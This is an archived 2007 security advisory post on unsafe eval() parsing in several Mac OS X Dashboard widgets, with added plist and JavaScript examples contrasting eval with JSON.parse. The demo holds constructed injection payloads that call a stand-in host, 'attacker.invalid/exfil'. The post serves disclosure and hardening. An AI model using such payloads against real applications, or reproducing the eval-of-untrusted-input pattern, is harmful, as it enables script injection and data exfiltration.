Some more widgets: Facebook, Hockey, FlickrInterestingNess (Re: [MacOS X] Insecure eval() in Twitgit and Twitterlex dashboard widgets)

SECURITYVULNS:DOC:18567
Dec 05, 2007
Source: vulners.com
This is a follow-up to [0] and [1].

Last night, I wrote:

> It would probably be an interesting exercise to go through some more
> dashboard widgets and grep for eval. I'd bet quite a bit that
> there's much more out there.

  • The (top-50) facebook widget [2] uses the AllowFullAccess
    configuration option, which effectively means what it says.

    This widget also uses JSON to access numerous facebook functions,
    and eval() to parse the results. Most of facebook's API is
    accessed through plain HTTP, of course, so the discussion in [0]
    and [1] fully applies. It might be interesting to see whether one
    of the facebook JSON APIs is susceptible to cross-site-scripting
    attacks.

    The vulnerability is actually imported from the facebook API
    JavaScript library [7], and will affect any other JavaScript code
    that relies on that library.
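    For comparison, here is what the two ends of the privilege spectrum
    look like in a widget's Info.plist. This is an added illustration,
    not the Facebook widget's actual property list (the post does not
    reproduce it); the key names are Apple's documented Dashboard
    access keys, the bundle identifier is made up, and the other
    mandatory keys (CFBundleName, MainHTML, ...) are left out.

```xml
<!-- Added example; not any real widget's Info.plist. -->

<!-- Weak: AllowFullAccess switches on every individual access key at
     once (file access outside the bundle, Internet plug-ins, Java,
     network access, widget.system()). Every eval() of untrusted data
     in the widget then runs with all of that. -->
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key>
    <string>org.example.socialwidget</string>   <!-- made-up identifier -->
    <key>AllowFullAccess</key>
    <true/>
</dict>
</plist>

<!-- Least privilege: a widget that only talks to a web API needs
     network access and nothing else. Script injected through eval()
     can still make HTTP requests, but cannot run commands, read the
     user's files, or load Internet plug-ins. -->
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key>
    <string>org.example.socialwidget</string>   <!-- made-up identifier -->
    <key>AllowNetworkAccess</key>
    <true/>
</dict>
</plist>
```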

The following two are somewhat more shy with respect to the holes
they blow into the dashboard's JavaScript sandbox, and therefore a
bit less interesting:

  • The Hockey widget [3], currently presented as an Apple Staff Pick
    on [4], performs a lot of screen – or rather, script – scraping.
    Here's a little gem:

      // Take the fetched NHL page and flatten it to a single line ...
      var xmlResponse = xmlRequest.responseText;
      xmlResponse = xmlResponse.replace(/[\n\r]/g,"");
      var NHLatl = null;
      // ... cut the "var NHLatl = {...}" assignment out of a <script>
      // block with regular expressions ...
      var gameData = xmlResponse.match(/script[^<]*var NHLatl.*?<\/script>/)[0].replace(/.*?var /,"").replace(/,\s*myScoresIcon.*/,"}");
      // ... and execute it. Whatever that page serves inside the block
      // runs in the widget's scope.
      eval(gameData);


    So, for a change, the threat is not due to JSON, but due to the
    use of eval to extract data from JavaScript embedded with some Web
    page out there.

    The privileges gained with this one are a bit boring, as it's only
    the ability to go out on the network. But wait for the day on
    which AllowSystem is added in order to get Growl notifications of
    recent results!

  • The Flickr Interestingness widget [5] (unfortunately, these folks
    don't give a contact e-mail address) uses JSON with eval to check
    for the availability of upgrades, and to fetch data from the
    flickr API.

    This widget comes with the AllowInternetPlugins privilege, and is
    therefore another vector through which one could exercise, say,
    the latest QuickTime vulnerability. [6]
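
The following is an added example, not code from this post or from any
of the widgets it names. It puts both patterns discussed above side by
side: a JSON response parsed with eval() (Facebook, Flickr) and a page
script scraped and eval()ed (Hockey), each next to a replacement that
only accepts data. Everything in it is constructed: the responses, the
page, the fetchUrl() stand-in for a privileged widget call, and the
assumption that myScoresIcon is the first property the Hockey regex
chops off.

```javascript
// Added example; not the original post's code nor any widget's code.
// Stand-in for a privileged widget capability the attacker wants to reach
// (network access here; with AllowFullAccess it could be widget.system()).
const privileged = { calls: [] };
function fetchUrl(url) { privileged.calls.push(url); }

// --- Pattern 1: JSON response parsed with eval() ---------------------------

// What the widgets do. Direct eval runs in the caller's scope, so whatever
// the server (or anyone on the plain-HTTP path) sends can call fetchUrl().
function parseJsonWithEval(text) {
  return eval('(' + text + ')');
}

// Hardened replacement: JSON.parse accepts data only and throws on code.
function parseJsonSafely(text) {
  return JSON.parse(text);
}

// Constructed responses. The hostile one closes the parenthesised literal,
// runs a statement, and reopens it so the whole thing still yields "data".
const BENIGN_JSON = '{"score": 3}';
const HOSTILE_JSON =
  '{"score": 3}); fetchUrl("http://attacker.invalid/exfil"); ({"score": 3}';

// --- Pattern 2: script scraping, Hockey-widget style -----------------------

// The same regex pipeline as the snippet quoted above, minus the eval, so
// the string that would be evaluated can be inspected.
function scrapeNhlAssignment(html) {
  const body = html.replace(/[\n\r]/g, '');
  const m = body.match(/script[^<]*var NHLatl.*?<\/script>/);
  if (!m) return null;
  return m[0].replace(/.*?var /, '').replace(/,\s*myScoresIcon.*/, '}');
}

// Original behaviour: evaluate the scraped text as an assignment to NHLatl.
function loadNhlWithEval(html) {
  var NHLatl = null;
  eval(scrapeNhlAssignment(html)); // "NHLatl = {...}" ... or anything else
  return NHLatl;
}

// Hardened: strip the assignment prefix and parse the rest as JSON. A
// statement smuggled into the page fails to parse instead of running.
function loadNhlSafely(html) {
  const assignment = scrapeNhlAssignment(html);
  if (assignment === null) return null;
  const m = assignment.match(/^NHLatl\s*=\s*([\s\S]*)$/);
  if (!m) throw new SyntaxError('unexpected scrape result');
  return JSON.parse(m[1]);
}

// Constructed pages. Assumed layout: myScoresIcon is the first property
// after the ones the widget wants, which is what the "}" substitution
// relies on.
const BENIGN_PAGE =
  '<html><script>var NHLatl = {"home": "MTL", "away": "TOR", ' +
  'myScoresIcon: "i.gif"};</script></html>';
const HOSTILE_PAGE =
  '<html><script>var NHLatl = {}; fetchUrl("http://attacker.invalid/"); ' +
  'var junk = {"x": 1, myScoresIcon: 0};</script></html>';

// Run a parser on one input and report what came back, whether it threw,
// and which privileged calls happened as a side effect.
function run(parser, input) {
  privileged.calls.length = 0;
  let result = null, threw = false;
  try { result = parser(input); } catch (e) { threw = true; }
  return { result, threw, calls: privileged.calls.slice() };
}

// Stand-alone demo: the eval() variants make the attacker's call, the
// JSON.parse variants reject the same input and make none.
for (const [label, parser, input] of [
  ['eval JSON', parseJsonWithEval, HOSTILE_JSON],
  ['JSON.parse', parseJsonSafely, HOSTILE_JSON],
  ['eval scrape', loadNhlWithEval, HOSTILE_PAGE],
  ['safe scrape', loadNhlSafely, HOSTILE_PAGE],
]) {
  const r = run(parser, input);
  console.log(label, 'threw:', r.threw, 'privileged calls:', r.calls);
}
```

Note that the hardened versions still trust the server for the *content*
of the data; they only stop the response from being executed. Fetching
over plain HTTP remains a problem for data integrity, just no longer
for code execution.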

  0. http://log.does-not-exist.org/archives/2007/12/03/2155_json_eval_owning_the_dashboard.html
  1. http://www.securityfocus.com/archive/1/484542/30/0/threaded
  2. http://www.apple.com/downloads/dashboard/email_messaging/facebookwidget.html
  3. http://www.apple.com/downloads/dashboard/sports/hockeywidget.html
  4. http://www.apple.com/downloads/dashboard/
  5. http://www.apple.com/downloads/dashboard/blogs_forums/flickrinterestingness.html
  6. http://www.securityfocus.com/bid/26549
  7. http://developersdigest.org/wordpress/?page_id=4

Cheers,

Thomas Roessler, W3C <[email protected]>